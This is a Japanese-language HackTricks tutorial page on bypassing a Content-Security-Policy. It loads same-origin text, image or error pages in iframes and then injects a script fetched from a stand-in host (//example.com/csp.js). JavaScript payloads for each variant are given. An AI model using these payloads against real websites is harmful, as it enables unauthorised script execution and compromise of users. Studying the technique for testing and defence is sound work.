mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
82 lines
5 KiB
Markdown
82 lines
5 KiB
Markdown
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
|
||
次のような設定:
|
||
```
|
||
Content-Security-Policy: default-src 'self' 'unsafe-inline';
|
||
```
|
||
コードを文字列として送信する関数の使用を禁止します。例えば:`eval, setTimeout, setInterval` はすべて `unsafe-eval` の設定によりブロックされます。
|
||
|
||
外部ソースからのコンテンツもすべてブロックされます。これには画像、CSS、WebSockets、特にJSが含まれます。
|
||
|
||
### テキストと画像を介して
|
||
|
||
現代のブラウザは、表示を向上させるために画像やテキストをHTMLに変換することが観察されています(例:背景の設定、中央揃えなど)。その結果、`iframe`を介して`favicon.ico`や`robots.txt`のような画像やテキストファイルが開かれると、それはHTMLとしてレンダリングされます。特に、これらのページはCSPヘッダーを欠いていることが多く、X-Frame-Optionsが含まれていない場合があり、そこから任意のJavaScriptを実行できる可能性があります。
|
||
```javascript
|
||
frame=document.createElement("iframe");
|
||
frame.src="/css/bootstrap.min.css";
|
||
document.body.appendChild(frame);
|
||
script=document.createElement('script');
|
||
script.src='//example.com/csp.js';
|
||
window.frames[0].document.head.appendChild(script);
|
||
```
|
||
### Via Errors
|
||
|
||
同様に、テキストファイルや画像のようなエラーレスポンスは、通常CSPヘッダーなしで提供され、X-Frame-Optionsを省略することがあります。エラーはiframe内で読み込むように誘発でき、以下のアクションを可能にします:
|
||
```javascript
|
||
// Inducing an nginx error
|
||
frame=document.createElement("iframe");
|
||
frame.src="/%2e%2e%2f";
|
||
document.body.appendChild(frame);
|
||
|
||
// Triggering an error with a long URL
|
||
frame=document.createElement("iframe");
|
||
frame.src="/"+"A".repeat(20000);
|
||
document.body.appendChild(frame);
|
||
|
||
// Generating an error via extensive cookies
|
||
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
|
||
frame=document.createElement("iframe");
|
||
frame.src="/";
|
||
document.body.appendChild(frame);
|
||
// Removal of cookies is crucial post-execution
|
||
for(var i=0;i<5;i++){document.cookie=i+"="}
|
||
```
|
||
指定されたシナリオのいずれかをトリガーした後、iframe内でのJavaScript実行は次のように実現できます:
|
||
```javascript
|
||
script=document.createElement('script');
|
||
script.src='//example.com/csp.js';
|
||
window.frames[0].document.head.appendChild(script);
|
||
```
|
||
## 参考文献
|
||
|
||
* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)
|
||
|
||
|
||
{% hint style="success" %}
|
||
AWSハッキングを学び、実践する:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
GCPハッキングを学び、実践する:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>HackTricksをサポートする</summary>
|
||
|
||
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
|
||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
|
||
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
|
||
|
||
</details>
|
||
{% endhint %}
|